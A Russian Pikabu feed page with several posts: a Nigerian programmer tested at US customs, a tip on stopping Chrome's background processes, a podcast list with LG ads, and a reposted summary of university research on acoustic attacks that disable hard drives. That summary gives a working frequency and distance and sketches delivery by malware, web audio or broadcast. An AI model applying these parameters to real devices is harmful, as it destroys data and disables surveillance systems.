Введенные президентом США Дональдом Трампом ужесточенные правила прохождения таможни при пересечении американской границы снова стали предметом ожесточенных споров. Сотрудники таможенной службы заставили программиста из Нигерии пройти тест на знание компьютера и доказать, что он действительно является тем, кем представился.


28-летний Селестин Омин (Celestine Omin) привлек внимание нескольких местных стартапов, занимаясь бесплатным созданием сайтов для церквей. Вскоре разработчика заметила компания Andela, созданная Марком Цукербергом и Присциллой Чан с целью помочь талантливым африканским инженерам найти работу в крупных американских технологических компаниях.


В конце прошлой недели Омин впервые в жизни прилетел в США на встречу с представителями нью-йоркского подразделения Andela для обсуждения будущего совместного проекта. Проведя 24 часа в самолете, нигериец прибыл в аэропорт имени Джона Кеннеди, где сотрудники таможенно-пограничной службы попросили его пройти в отдельную комнату и ответить на несколько вопросов.


Таможенники усомнились в правдивости указанных в визе данных. Когда Омин подтвердил, что действительно является программистом, ему выдали лист бумаги и ручку и попросили ответить на 10 вопросов. Все вопросы касались темы программирования и были призваны проверить профессиональные навыки инженера.


К счастью для Омина, пока он проходил тест, таможенники связались с сотрудниками Andela, подтвердившими личность и профессию нигерийца. 

Показать полностью
2388

Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком

Источник - Хабрахабр

Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком Жесткий Диск, Компьютерное железо, Информационная безопасность, Звук, Длиннопост, Видео
Экспериментальная установка

Давно известно, что громкий крик или другой громкий звук нарушает работу жёсткого диска.

HDD подвержен микроскопическим вибрациям из-за колебаний окружающего воздуха. Это известно даже по техническим характеристикам HDD: производители обычно указывают максимально допустимый уровень вибраций, а сам жёсткий диск часто стараются поместить в защищённый от вибраций контейнер из резины или другого изоляционного материала. Скорость чтения информации с сектора зависит от положения головки и пластины, которое коррелирует с вибрациями корпуса HDD: за счёт этого эффекта HDD работает как микрофон.


Этот же эффект можно использовать для временного или необратимого выведения из строя HDD: если воспроизводить с колонки звук на частоте, которая резонирует с частотой HDD, то система отключает устройство с ошибкой ввода-вывода. Сам жёсткий диск может получить необратимые повреждения.


На прошлой неделе группа исследователей из Принстонского университета и университета Пердью (США) опубликовала научную статью с результатами своего исследования этой интересной темы.


Для проведения эксперимента исследователи собрали специальную тестовую установку, чтобы излучать на жёсткие диски звуковые волны разных частот под разными углами и на разном расстоянии. При этом регистрировалось, через какое время жёсткий диск прекращал функционировать и при каких параметрах звуковой атаки это произошло.


Таким образом удалось без проблем установить оптимальные углы атаки и частоты для каждой из протестированных моделей.

Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком Жесткий Диск, Компьютерное железо, Информационная безопасность, Звук, Длиннопост, Видео

Возможность проведения подобной атаки есть у любого злоумышленника, который оказался поблизости от винчестера жертвы и имеет при себе инструмент для генерации звука. Атака возможна разными способами: можно использовать собственные колонки или задействовать колонки, уже установленные на компьютере жертвы. В последнем случае теоретически возможно дистанционное проведение атаки путём установки на компьютер жертвы вредоносного программного обеспечения, которое подаст команду на запуск звукового сигнала определённой частоты, а затем погибнет вместе с жёстким диском, на котором оно записано. Провести атаку можно и без установки зловреда — следует лишь обманным путём заставить пользователя запустить на вопроизведение звуковой или видеофайл с посторонней веб-страницы.


Более того, учёные предупреждают о возможности широкомасштабных DDoS-атак на жёсткие диски через широковещательные системы — например, через радио и телевидение. Звук определённой частоты в этом случае внедряется в рекламное объявление и подаётся в эфир.


Но успешность атаки такого рода зависит от нескольких условий. Чем ближе источник звука находится к жёсткому диску — тем выше шансы на успех. Шансы повышаются также при увеличении продолжительности атаки.

Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком Жесткий Диск, Компьютерное железо, Информационная безопасность, Звук, Длиннопост, Видео
Минимальное расстояние для успешной звуковой атаки как функция от угла атаки для жёстких дисков на 1 ТБ и 4 ТБ

К сожалению для злоумышленника, успешная атака почти наверняка требует отсутствия человека около компьютера, потому что используемые звуковые частоты находятся в диапазоне, который воспринимается человеческим ухом. Человек может услышать монотонный звук на неизменной частоте — и связать его с периодическими отказами жёсткого диска. Тогда он догадается, как его атакуют.


Исследователи из Принстонского университета и университета Пердью провели успешные атаки на жёсткие диски, установленные в цифровых видеомагнитофонах, системах видеонаблюдения и настольных компьютерах под управлением Windows 10, Ubuntu 16 и Fedora 27. Например, система видеонаблюдения отключилась через 230 секунд звукового воздействия.

Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком Жесткий Диск, Компьютерное железо, Информационная безопасность, Звук, Длиннопост, Видео
Система видеонаблюдения отключилась через 230 секунд звукового воздействия
Настольный компьютер Lenovo H520s под Windows 10 атаковали с расстояния 25 сантиметров на частоте 9,1 кГц.
Опубликованы звуковые частоты и углы атаки для выведения из строя HDD разных моделей направленным звуком Жесткий Диск, Компьютерное железо, Информационная безопасность, Звук, Длиннопост, Видео

Научная статья опубликована 21 декабря 2017 года на сайте препринтов arXiv.org (arXiv:1712.07816v1).

Показать полностью 4
7085

Chrome продолжает работать даже после полного закрытия

Еще в 2011 году браузер Google Chrome обновился функцией, позволяющей расширениям и приложениям работать в фоновом режиме. Данная функция была введена с благой целью. Благодаря ей пользователи могут получать уведомления от приложений и расширений после закрытия браузера.



Однако в Google не подумали, что такая возможность требуется далеко не всем пользователям. Нажимая на кнопку закрытия Chrome, подавляющее большинство пользователей подразумевают его полное закрытие. На самом же деле оно не происходит. Множество процессов Chrome продолжают выполняться и нагружать компьютер, причем чем больше расширений установлено в браузере, тем сильнее нагрузка.

Функция, позволяющая сервисам браузера работать после его закрытия, по умолчанию включена у всех пользователей. К счастью, отключить ее очень просто.



Шаг 1. Вызовите меню параметров в правом верхнем углу окна Google Chrome и нажмите «Настройки».

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Шаг 2. В самом низу страницы с параметрами нажмите «Дополнительные».

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Шаг 3. Вновь прокрутите страницу до самого низа и переведите переключатель «Не отключать работающие в фоновом режиме сервисы при закрытии браузера» в неактивное положение.

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Готово! При следующем закрытии браузер Google Chrome ни один сервис, ни одно расширение браузера не останется работать, благодаря чему Chrome перестанет потреблять ценные ресурсы компьютера в то время, когда вы работаете с другими программами.

Показать полностью 2

25 актуальных подкастов на русском языке, которые стоит послушать

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

Подкастинг в России вовсю набирает обороты и сейчас чувствует себя лучше, чем когда бы то ни было. Свои подкасты делают Анатолий Чубайс, Николай Сванидзе, Данила Поперечный, разные компании и еще несколько тысяч энтузиастов по всему миру, которые рассказывают захватывающие истории, делятся опытом и обсуждают тренды.


Меня зовут Виталий, я создатель телеграм-канала «Подкасты наступают». В нем я рассказываю об интересных подкастах и беру интервью у создателей. Ниже мой личный рейтинг русскоязычных подкастов, все они до сих пор выходят или недавно завершили первый сезон.

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

Так вышло


Подкаст о том, что хорошо, а что плохо в 2019 году — двое ведущих спорят о моральных проблемах, с которыми сталкивается любой современный человек. Можно ли выносить информацию из закрытых групп в фейсбуке? А если речь идет об измене мужа вашей любимой подруги? Разрешать ли строительство прачечной для бездомных? А если она будет находиться рядом со школой, где учатся ваши дети? Можно ли улучшить мир малыми делами? Или помогут только великие свершения? И так далее, и так далее.


Blitz&Chips


Музыкальный критик и культуртрегер Гриша Пророков болтает со своими друзьями про современную культуру и все, что придет ему в голову, вплоть до комнатных растений.


НОРМ


Еще один подкаст с разговорами на жизненных темы, которые касаются каждого. Журналистки Даша Черкудинова и Настя Курганская зовут в гости друзей, чтобы поговорить о насущных проблемах — от расставания с партнером до раздельного сбора мусора. И советуют, как просить прибавку к зарплате и заводить друзей после 30 лет.


Это разве секс?


Обзоры курсов минета, интервью с порноактрисами, разговоры про феминизм и рассуждения, зачем нужны эротические рассказы в эпоху порно.


Это непросто


Серия отличных интервью с женщинами, которые преодолели трудности, чтобы создать свой бизнес. Если давно не можете решиться и сделать первый шаг — за вдохновением сюда.


Тумач


Стендап-комик из Англии Майло Эдвардс на русском языке рассказывает про свою жизнь, при этом половину слов он придумывает на ходу. Получается очень смешно.


Ребята, мы потрахались


Подкаст/стендап про отношения, иногда нарочно глуповатый, но всегда по-особому забавный.


Деньги пришли


Передача про то, что делать и чего лучше не делать со своими деньгами. Ее делают два бывших журналиста «Медузы» — Илья Красильщик и Александр Поливанов, а спонсор всего это веселья «Альфа-банк». Примерный список тем: сколько денег у Шнурова (рассказывает сам Шнуров), как живется игроку в покер, где работать, чтобы накопить на восьмимесячное путешествие, и, наконец, каково это — проиграть четыре миллиона на бирже Forex.


Проветримся!


Подкаст про IT и путешествия с остроумной идеей. Выпуски монтируются из аудиосообщений в телеграме, которыми обмениваются друзья и знакомые создателя подкаста — специалиста по искусственному интеллекту Ивана Ямщикова.


ТОК


Умный подкаст Юрия Сапрыкина: интервью с приглашенными гостями про 2019 год, современность и будущее.

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

В предыдущих сериях


Передача главного редактора «Кинопоиска» Лизы Сургановой и ведущего телеграм-канала «Запасаемся попкорном» Ивана Филиппова про сериалы. Обсуждают, например, какие сериалы 2019 года нужно смотреть и как эволюционировал жанр комедии — от ситкома до драмеди. Отдельно разбирают заметные премьеры («Чернобыль», пятый сезон «Черного зеркала», «Эйфория» и так далее).


Monday Karma


Очень внятный подкаст кинокритика Алексея Филиппова и его друзей о прокатном (и не только) кино.


Книжный базар


Передача литературного критика Галины Юзефович и переводчицы («Щегол», «Маленькая жизнь»), главного редактора Storytel Анастасии Завозовой про книги. Они спорят, соглашаются и советуют миллион книг, чтобы вопрос «что бы такого почитать» отпал раз и навсегда.


Русский шаффл


Подкаст одноименного телеграм-канала про актуальную русскую музыку: троллят русских рэперов, вспоминают 1990-е, открывают незаметные жемчужинки VK. Помимо прочего, есть хорошие выпуски с подборками свежих треков.


Отвратительные мужики


Проверенная временем передача о видеоиграх, боевиках, металле и прочих около мужских вещах от создателей мужского онлайн-журнала disgustingmen.com.


Для того, чтобы включить любимый плейлист или подкаст, необязательно даже смотреть в экран. Просто скажите: «Эй, Алиса, включи подкаст Отвратительных мужиков!». Умная колонка LG с голосовым помощником «Алисой» быстро справится с этой задачей, а еще включит будильник или музыку, посмотрит погоду и просто с вами поболтает.

Cappuccino&Catenaccio


Самое вменяемое русскоязычное шоу про европейский футбол с философским уклоном. Авторы — спортивный журналист со стажем Игорь Порошин и один из главных футбольных аналитиков России Вадим Лукомский.


Чемпионат. Подкаст


Лучший подкаст про Английскую Премьер-лигу прямо сейчас. Ведут его два сотрудника сайта championat — Кирилл Хаит и Григорий Телингатер.

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

Не перебивай


Захватывающие истории. Например, о том, как русский летчик стал работать пилотом гражданской авиации в Африке. Все описанное в подкасте происходило на самом деле!


8 историй из 90-х


Подкаст Русской службы Би-би-си о том, как жилось в 90-е — на примере вратаря сборной России по футболу Филимонова, защитников Белого дома и других ярких персонажей.


Трасса 161


Подкаст про маньяка из Хакасии, который на протяжении пяти лет насиловал и убивал женщин. Очень сильная журналистская работа и звук.


Глаголев.FM


Много подкастов при сайте «Батенька, да вы трансформер» с характерным стилем подачи. От социологического анализа детских страшилок до будней редактора.


Голос зоны


Подкаст «Медиазоны» про реальную рэп-группу, все члены которой сейчас сидят в тюрьме.


Перемотка


Истории из прошлого, сделанные из аудиодневников (как правило, записанных на кассетные магнитофоны). Еще один подкаст с мощной звукорежиссурой — к концу эпизода обычно хочется плакать.

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

Либо выйдет, либо нет


Реалити-шоу про то, как в 2019 году запускают подкастный бизнес в России. Подкаст — осознанная реплика одной из известных передач мира, американского шоу StartUp.


Кристина, добрый день!


Веселые интервью с создателями подкастов о том, зачем они это делают. Удобный способ узнавать о новинках.


А теперь немного важной информации. Вы можете выиграть классный монитор LG UltraWide 29WK600-W или умную колонку LG с «Алисой» в рамках месяца музыки и звука на Пикабу. Вот такие:

25 актуальных подкастов на русском языке, которые стоит послушать Длиннопост

Для этого нужно в октябре написать авторский пост на Пикабу по теме месяца, поставить тег #звук или #музыка и метку [моё]. Лучшие посты попадут в голосование, а дальше судьба монитора и умной колонки — в руках пикабушников и пикабушниц.


Текст: Виталий Волк

Показать полностью 4
Отличная работа, все прочитано!